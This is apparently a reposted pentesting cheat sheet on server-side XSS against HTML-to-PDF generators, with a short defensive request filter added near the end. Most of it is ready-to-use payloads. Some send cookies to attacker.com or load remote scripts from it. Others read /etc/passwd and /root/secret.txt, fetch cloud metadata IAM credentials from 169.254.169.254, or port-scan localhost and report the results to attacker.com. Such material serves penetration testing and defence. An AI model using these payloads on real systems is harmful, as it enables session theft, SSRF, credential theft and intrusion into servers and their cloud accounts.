Server Side XSS (Dynamic PDF)

Basic introduction

If a web page creates a PDF from user-controlled input, you can try to trick the bot that creates the PDF into executing arbitrary JS code. When the PDF creator bot encounters certain HTML tags it will interpret them, and you can abuse that behaviour to cause a server-side XSS. Note that the <script></script> tags do not always work, so you need a different way to execute JS (for example, abusing <img).

In a regular exploitation you will be able to see or download the created PDF, so you will be able to see everything you wrote via JS (for example with document.write()). If you cannot see the created PDF, you will probably need to extract the information by making the bot send web requests to you (blind).

Common payloads

Discovery Payload

<!-- Basic discovery, Write something-->
<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>

<!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">

SVG Payload

In this SVG payload you can use any of the previous payloads; the example below uses one iframe to access a burpcollaborator subdomain and another iframe to access the metadata endpoint.

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
    <g>
        <foreignObject width="800" height="500">
            <body xmlns="http://www.w3.org/1999/xhtml">
                <iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
                <iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
            </body>
        </foreignObject>
    </g>
</svg>

<svg width="100%" height="100%" viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <circle cx="50" cy="50" r="45" fill="green" id="foo"/>
  <script type="text/javascript">
    // <![CDATA[
    alert(1);
    // ]]>
  </script>
</svg>

You can find more payloads at the following link:

https://github.com/allanlw/svg-cheatsheet

Path disclosure

<!-- If the bot is accessing a file:// path, you will discover the internal path.
     If not, you will at least learn which path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>

Load an external script

<script src="http://attacker.com/myscripts.js"></script>
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>

Read local file

<script>x=new XMLHttpRequest;x.onload=function(){document.write(btoa(this.responseText))};x.open("GET","file:///etc/passwd");x.send();</script>
<script>
    xhzeem = new XMLHttpRequest();
    xhzeem.open("GET","file:///etc/passwd");
    xhzeem.send();
    xhzeem.onload = function(){document.write(this.responseText);}
    xhzeem.onerror = function(){document.write('failed!')}
</script>
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>

Get external web page response as attachment (metadata endpoints)

<link rel=attachment href="http://169.254.169.254/latest/meta-data/iam/security-credentials/">

Bot delay

<!--Make the bot send a ping every 500ms to check how long the bot waits-->
<script>
    let time = 500;
    setInterval(()=>{
        let img = document.createElement("img");
        img.src = `https://attacker.com/ping?time=${time}ms`;
        time += 500;
    }, 500);
</script>
<img src="https://attacker.com/delay">

Port Scan

<!--Scan local ports and receive a ping indicating which ones are found-->
<script>
const checkPort = (port) => {
    fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
        let img = document.createElement("img");
        img.src = `http://attacker.com/ping?port=${port}`;
    });
}

for(let i=0; i<1000; i++) {
    checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">
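A defensive counterpart to the local-file, metadata-endpoint and port-scan payloads above, added here as an example and not code from the original post: a request policy the PDF renderer can apply to every sub-resource fetch (through headless-browser request interception or an egress proxy, for instance), so that rendered HTML cannot reach file:// paths, 169.254.169.254 or loopback ports. All function and constant names are this example's own assumptions.

```javascript
// Added example: an allow/deny decision for each URL a server-side HTML-to-PDF
// renderer is about to fetch. Names and lists here are assumptions of this example.

// Only plain web schemes are allowed; file:, javascript:, data: etc. are denied.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Hostnames that always resolve to the rendering box or its cloud metadata service.
const DENIED_HOSTS = new Set(["localhost", "metadata.google.internal"]);

// Parse a dotted IPv4 literal into its four octets, or return null if it is not one.
function ipv4Octets(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const octets = m.slice(1).map(Number);
  return octets.every((n) => n <= 255) ? octets : null;
}

// Loopback, RFC 1918 private, link-local (which covers 169.254.169.254) and 0.0.0.0/8.
function isInternalIpv4([a, b]) {
  return a === 127 || a === 10 || a === 0 || (a === 169 && b === 254) ||
    (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

// Returns true when the renderer may fetch rawUrl, false when it must be blocked.
// Node's WHATWG URL parser canonicalises numeric hosts such as 0x7f000001 or
// 2130706433 to dotted form, so the octet check sees the real address.
function isAllowedRendererRequest(rawUrl) {
  let u;
  try { u = new URL(rawUrl); } catch { return false; }   // unparsable: deny
  if (!ALLOWED_SCHEMES.has(u.protocol)) return false;
  const host = u.hostname.toLowerCase();
  if (DENIED_HOSTS.has(host) || host.endsWith(".localhost")) return false;
  if (host.startsWith("[")) return false;                 // IPv6 literal (::1, ::ffff:...): deny
  const octets = ipv4Octets(host);
  if (octets && isInternalIpv4(octets)) return false;
  return true;
}
```

The check is only as strong as the point where it runs: apply it to the address actually connected to (or pin DNS in the egress proxy), otherwise a hostname that later resolves to an internal address bypasses a parse-time filter.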

References

https://lbherrera.github.io/lab/h1415-ctf-writeup.html

Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read

Original article, author: 七芒星实验室. If reposting, please credit the source: https://www.sudun.com/ask/34304.html
